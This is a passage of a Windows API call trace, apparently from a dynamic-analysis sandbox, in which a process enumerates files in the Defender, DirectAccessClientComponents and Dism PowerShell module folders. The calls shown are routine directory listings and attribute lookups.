ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x597, dwReserved0=0x0, dwReserved1=0x0, cFileName="MSFT_MpThreat.cdxml", cAlternateFileName="")) returned 1 [0226.156] FindNextFileW (in: hFindFile=0x1a5cf670, lpFindFileData=0x1b7fe260 | out: lpFindFileData=0x1b7fe260*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe2d621b, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0xe2d621b, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0xe2d621b, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x3a5, dwReserved0=0x0, dwReserved1=0x0, cFileName="MSFT_MpThreatCatalog.cdxml", cAlternateFileName="")) returned 1 [0226.156] FindNextFileW (in: hFindFile=0x1a5cf670, lpFindFileData=0x1b7fe260 | out: lpFindFileData=0x1b7fe260*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe2fc46e, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0xe2fc46e, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0xe2fc46e, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x39d, dwReserved0=0x0, dwReserved1=0x0, cFileName="MSFT_MpThreatDetection.cdxml", cAlternateFileName="")) returned 1 [0226.156] FindNextFileW (in: hFindFile=0x1a5cf670, lpFindFileData=0x1b7fe260 | out: lpFindFileData=0x1b7fe260*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe2fc46e, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0xe2fc46e, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0xe2fc46e, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x2c0, dwReserved0=0x0, dwReserved1=0x0, cFileName="MSFT_MpWDOScan.cdxml", cAlternateFileName="")) returned 1 [0226.157] FindNextFileW (in: hFindFile=0x1a5cf670, lpFindFileData=0x1b7fe260 | out: lpFindFileData=0x1b7fe260*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe2fc46e, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0xe2fc46e, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0xe2fc46e, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x2c0, dwReserved0=0x0, dwReserved1=0x0, cFileName="MSFT_MpWDOScan.cdxml", cAlternateFileName="")) returned 0 [0226.157] FindClose (in: hFindFile=0x1a5cf670 | out: hFindFile=0x1a5cf670) returned 1 [0226.157] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b7fe4c0) returned 1 [0226.157] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b7fe480) returned 1 [0226.157] GetFileAttributesW (lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Defender\\Defender.psd1" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\defender\\defender.psd1")) returned 0x20 [0226.157] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1b7fe510) returned 1 [0226.157] GetFullPathNameW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\DirectAccessClientComponents", nBufferLength=0x105, lpBuffer=0x1b7fe000, lpFilePart=0x0 | out: lpBuffer="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\DirectAccessClientComponents", lpFilePart=0x0) returned 0x4f [0226.157] GetFullPathNameW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\DirectAccessClientComponents\\", nBufferLength=0x105, lpBuffer=0x1b7fdfa0, lpFilePart=0x0 | out: lpBuffer="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\DirectAccessClientComponents\\", lpFilePart=0x0) returned 0x50 [0226.158] FindFirstFileW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\DirectAccessClientComponents\\*", lpFindFileData=0x1b7fe1b0 | out: lpFindFileData=0x1b7fe1b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x12fbf40, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x132219b, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0x132219b, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x1a5cf7f0 [0226.158] FindNextFileW (in: hFindFile=0x1a5cf7f0, lpFindFileData=0x1b7fe200 | out: lpFindFileData=0x1b7fe200*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x12fbf40, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x132219b, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0x132219b, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0226.158] FindNextFileW (in: hFindFile=0x1a5cf7f0, lpFindFileData=0x1b7fe200 | out: lpFindFileData=0x1b7fe200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xfa3b30d, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0xfa3b30d, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0xfa3b30d, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x436, dwReserved0=0x0, dwReserved1=0x0, cFileName="DirectAccessClientComponents.psd1", cAlternateFileName="")) returned 1 [0226.158] FindNextFileW (in: hFindFile=0x1a5cf7f0, lpFindFileData=0x1b7fe200 | out: lpFindFileData=0x1b7fe200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xfa6155b, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0xfa6155b, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0xfa6155b, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x1f81, dwReserved0=0x0, dwReserved1=0x0, cFileName="MSFT_DAClientExperienceConfiguration.cdxml", cAlternateFileName="")) returned 1 [0226.159] FindNextFileW (in: hFindFile=0x1a5cf7f0, lpFindFileData=0x1b7fe200 | out: lpFindFileData=0x1b7fe200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xfa6155b, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0xfa6155b, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0xfa6155b, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x8bd, dwReserved0=0x0, dwReserved1=0x0, cFileName="MSFT_DAClientExperienceConfiguration.format.ps1xml", cAlternateFileName="")) returned 1 [0226.159] FindNextFileW (in: hFindFile=0x1a5cf7f0, lpFindFileData=0x1b7fe200 | out: lpFindFileData=0x1b7fe200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xfa877b6, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0xfa877b6, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0xfa877b6, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x2af, dwReserved0=0x0, dwReserved1=0x0, cFileName="MSFT_DAClientExperienceConfiguration.types.ps1xml", cAlternateFileName="")) returned 1 [0226.159] FindNextFileW (in: hFindFile=0x1a5cf7f0, lpFindFileData=0x1b7fe200 | out: lpFindFileData=0x1b7fe200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xfaada0c, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0xfaada0c, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0xfaada0c, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x3f30, dwReserved0=0x0, dwReserved1=0x0, cFileName="MSFT_DASiteTableEntry.cdxml", cAlternateFileName="")) returned 1 [0226.159] FindNextFileW (in: hFindFile=0x1a5cf7f0, lpFindFileData=0x1b7fe200 | out: lpFindFileData=0x1b7fe200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xfaada0c, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0xfaada0c, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0xfaada0c, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x776, dwReserved0=0x0, dwReserved1=0x0, cFileName="MSFT_DASiteTableEntry.format.ps1xml", cAlternateFileName="")) returned 1 [0226.160] FindNextFileW (in: hFindFile=0x1a5cf7f0, lpFindFileData=0x1b7fe200 | out: lpFindFileData=0x1b7fe200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xfa6155b, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0xfa6155b, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0xfa6155b, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x4e2, dwReserved0=0x0, dwReserved1=0x0, cFileName="MSFT_DASiteTableEntry.types.ps1xml", cAlternateFileName="")) returned 1 [0226.160] FindNextFileW (in: hFindFile=0x1a5cf7f0, lpFindFileData=0x1b7fe200 | out: lpFindFileData=0x1b7fe200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xfa6155b, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0xfa6155b, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0xfa6155b, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x4e2, dwReserved0=0x0, dwReserved1=0x0, cFileName="MSFT_DASiteTableEntry.types.ps1xml", cAlternateFileName="")) returned 0 [0226.160] FindClose (in: hFindFile=0x1a5cf7f0 | out: hFindFile=0x1a5cf7f0) returned 1 [0226.160] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b7fe460) returned 1 [0226.160] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b7fe420) returned 1 [0226.160] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1b7fe510) returned 1 [0226.160] GetFullPathNameW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\DirectAccessClientComponents", nBufferLength=0x105, lpBuffer=0x1b7fe000, lpFilePart=0x0 | out: lpBuffer="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\DirectAccessClientComponents", lpFilePart=0x0) returned 0x4f [0226.160] GetFullPathNameW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\DirectAccessClientComponents\\", nBufferLength=0x105, lpBuffer=0x1b7fdfa0, lpFilePart=0x0 | out: lpBuffer="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\DirectAccessClientComponents\\", lpFilePart=0x0) returned 0x50 [0226.160] FindFirstFileW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\DirectAccessClientComponents\\*", lpFindFileData=0x1b7fe1b0 | out: lpFindFileData=0x1b7fe1b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x12fbf40, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x132219b, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0x132219b, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x1a5cf670 [0226.161] FindNextFileW (in: hFindFile=0x1a5cf670, lpFindFileData=0x1b7fe200 | out: lpFindFileData=0x1b7fe200*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x12fbf40, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x132219b, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0x132219b, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0226.161] FindNextFileW (in: hFindFile=0x1a5cf670, lpFindFileData=0x1b7fe200 | out: lpFindFileData=0x1b7fe200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xfa3b30d, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0xfa3b30d, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0xfa3b30d, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x436, dwReserved0=0x0, dwReserved1=0x0, cFileName="DirectAccessClientComponents.psd1", cAlternateFileName="")) returned 1 [0226.161] FindNextFileW (in: hFindFile=0x1a5cf670, lpFindFileData=0x1b7fe200 | out: lpFindFileData=0x1b7fe200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xfa6155b, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0xfa6155b, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0xfa6155b, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x1f81, dwReserved0=0x0, dwReserved1=0x0, cFileName="MSFT_DAClientExperienceConfiguration.cdxml", cAlternateFileName="")) returned 1 [0226.161] FindNextFileW (in: hFindFile=0x1a5cf670, lpFindFileData=0x1b7fe200 | out: lpFindFileData=0x1b7fe200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xfa6155b, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0xfa6155b, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0xfa6155b, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x8bd, dwReserved0=0x0, dwReserved1=0x0, cFileName="MSFT_DAClientExperienceConfiguration.format.ps1xml", cAlternateFileName="")) returned 1 [0226.161] FindNextFileW (in: hFindFile=0x1a5cf670, lpFindFileData=0x1b7fe200 | out: lpFindFileData=0x1b7fe200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xfa877b6, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0xfa877b6, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0xfa877b6, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x2af, dwReserved0=0x0, dwReserved1=0x0, cFileName="MSFT_DAClientExperienceConfiguration.types.ps1xml", cAlternateFileName="")) returned 1 [0226.161] FindNextFileW (in: hFindFile=0x1a5cf670, lpFindFileData=0x1b7fe200 | out: lpFindFileData=0x1b7fe200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xfaada0c, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0xfaada0c, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0xfaada0c, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x3f30, dwReserved0=0x0, dwReserved1=0x0, cFileName="MSFT_DASiteTableEntry.cdxml", cAlternateFileName="")) returned 1 [0226.162] FindNextFileW (in: hFindFile=0x1a5cf670, lpFindFileData=0x1b7fe200 | out: lpFindFileData=0x1b7fe200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xfaada0c, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0xfaada0c, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0xfaada0c, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x776, dwReserved0=0x0, dwReserved1=0x0, cFileName="MSFT_DASiteTableEntry.format.ps1xml", cAlternateFileName="")) returned 1 [0226.162] FindNextFileW (in: hFindFile=0x1a5cf670, lpFindFileData=0x1b7fe200 | out: lpFindFileData=0x1b7fe200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xfa6155b, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0xfa6155b, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0xfa6155b, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x4e2, dwReserved0=0x0, dwReserved1=0x0, cFileName="MSFT_DASiteTableEntry.types.ps1xml", cAlternateFileName="")) returned 1 [0226.162] FindNextFileW (in: hFindFile=0x1a5cf670, lpFindFileData=0x1b7fe200 | out: lpFindFileData=0x1b7fe200*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0226.162] FindClose (in: hFindFile=0x1a5cf670 | out: hFindFile=0x1a5cf670) returned 1 [0226.162] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b7fe460) returned 1 [0226.162] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b7fe420) returned 1 [0226.162] GetFullPathNameW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\DirectAccessClientComponents", nBufferLength=0x105, lpBuffer=0x1b7fe100, lpFilePart=0x0 | out: lpBuffer="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\DirectAccessClientComponents", lpFilePart=0x0) returned 0x4f [0226.162] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1b7fe540) returned 1 [0226.162] GetFileAttributesExW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\DirectAccessClientComponents" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\directaccessclientcomponents"), fInfoLevelId=0x0, lpFileInformation=0x1b7fe620 | out: lpFileInformation=0x1b7fe620*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x12fbf40, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x132219b, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0x132219b, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x1000)) returned 1 [0226.162] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b7fe500) returned 1 [0226.162] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1b7fe570) returned 1 [0226.163] GetFullPathNameW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\DirectAccessClientComponents", nBufferLength=0x105, lpBuffer=0x1b7fe060, lpFilePart=0x0 | out: lpBuffer="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\DirectAccessClientComponents", lpFilePart=0x0) returned 0x4f [0226.163] GetFullPathNameW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\DirectAccessClientComponents\\", nBufferLength=0x105, lpBuffer=0x1b7fe000, lpFilePart=0x0 | out: lpBuffer="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\DirectAccessClientComponents\\", lpFilePart=0x0) returned 0x50 [0226.163] FindFirstFileW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\DirectAccessClientComponents\\*", lpFindFileData=0x1b7fe210 | out: lpFindFileData=0x1b7fe210*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x12fbf40, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x132219b, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0x132219b, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x1a5cf730 [0226.163] FindNextFileW (in: hFindFile=0x1a5cf730, lpFindFileData=0x1b7fe260 | out: lpFindFileData=0x1b7fe260*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x12fbf40, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x132219b, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0x132219b, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0226.163] FindNextFileW (in: hFindFile=0x1a5cf730, lpFindFileData=0x1b7fe260 | out: lpFindFileData=0x1b7fe260*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xfa3b30d, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0xfa3b30d, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0xfa3b30d, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x436, dwReserved0=0x0, dwReserved1=0x0, cFileName="DirectAccessClientComponents.psd1", cAlternateFileName="")) returned 1 [0226.163] FindNextFileW (in: hFindFile=0x1a5cf730, lpFindFileData=0x1b7fe260 | out: lpFindFileData=0x1b7fe260*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xfa6155b, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0xfa6155b, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0xfa6155b, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x1f81, dwReserved0=0x0, dwReserved1=0x0, cFileName="MSFT_DAClientExperienceConfiguration.cdxml", cAlternateFileName="")) returned 1 [0226.164] FindNextFileW (in: hFindFile=0x1a5cf730, lpFindFileData=0x1b7fe260 | out: lpFindFileData=0x1b7fe260*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xfa6155b, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0xfa6155b, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0xfa6155b, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x8bd, dwReserved0=0x0, dwReserved1=0x0, cFileName="MSFT_DAClientExperienceConfiguration.format.ps1xml", cAlternateFileName="")) returned 1 [0226.164] FindNextFileW (in: hFindFile=0x1a5cf730, lpFindFileData=0x1b7fe260 | out: lpFindFileData=0x1b7fe260*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xfa877b6, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0xfa877b6, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0xfa877b6, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x2af, dwReserved0=0x0, dwReserved1=0x0, cFileName="MSFT_DAClientExperienceConfiguration.types.ps1xml", cAlternateFileName="")) returned 1 [0226.164] FindNextFileW (in: hFindFile=0x1a5cf730, lpFindFileData=0x1b7fe260 | out: lpFindFileData=0x1b7fe260*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xfaada0c, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0xfaada0c, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0xfaada0c, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x3f30, dwReserved0=0x0, dwReserved1=0x0, cFileName="MSFT_DASiteTableEntry.cdxml", cAlternateFileName="")) returned 1 [0226.164] FindNextFileW (in: hFindFile=0x1a5cf730, lpFindFileData=0x1b7fe260 | out: lpFindFileData=0x1b7fe260*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xfaada0c, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0xfaada0c, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0xfaada0c, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x776, dwReserved0=0x0, dwReserved1=0x0, cFileName="MSFT_DASiteTableEntry.format.ps1xml", cAlternateFileName="")) returned 1 [0226.164] FindNextFileW (in: hFindFile=0x1a5cf730, lpFindFileData=0x1b7fe260 | out: lpFindFileData=0x1b7fe260*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xfa6155b, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0xfa6155b, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0xfa6155b, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x4e2, dwReserved0=0x0, dwReserved1=0x0, cFileName="MSFT_DASiteTableEntry.types.ps1xml", cAlternateFileName="")) returned 1 [0226.164] FindNextFileW (in: hFindFile=0x1a5cf730, lpFindFileData=0x1b7fe260 | out: lpFindFileData=0x1b7fe260*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xfa6155b, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0xfa6155b, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0xfa6155b, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x4e2, dwReserved0=0x0, dwReserved1=0x0, cFileName="MSFT_DASiteTableEntry.types.ps1xml", cAlternateFileName="")) returned 0 [0226.165] FindClose (in: hFindFile=0x1a5cf730 | out: hFindFile=0x1a5cf730) returned 1 [0226.165] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b7fe4c0) returned 1 [0226.165] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b7fe480) returned 1 [0226.165] GetFileAttributesW (lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\DirectAccessClientComponents\\DirectAccessClientComponents.psd1" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\directaccessclientcomponents\\directaccessclientcomponents.psd1")) returned 0x20 [0226.165] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1b7fe510) returned 1 [0226.165] GetFullPathNameW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Dism", nBufferLength=0x105, lpBuffer=0x1b7fe000, lpFilePart=0x0 | out: lpBuffer="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Dism", lpFilePart=0x0) returned 0x37 [0226.165] GetFullPathNameW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Dism\\", nBufferLength=0x105, lpBuffer=0x1b7fdfa0, lpFilePart=0x0 | out: lpBuffer="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Dism\\", lpFilePart=0x0) returned 0x38 [0226.165] FindFirstFileW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Dism\\*", lpFindFileData=0x1b7fe1b0 | out: lpFindFileData=0x1b7fe1b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x132219b, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xbe8d4b97, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0xbe8d4b97, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x1a5cf670 [0226.166] FindNextFileW (in: hFindFile=0x1a5cf670, lpFindFileData=0x1b7fe200 | out: lpFindFileData=0x1b7fe200*(dwFileAttributes=0x10, 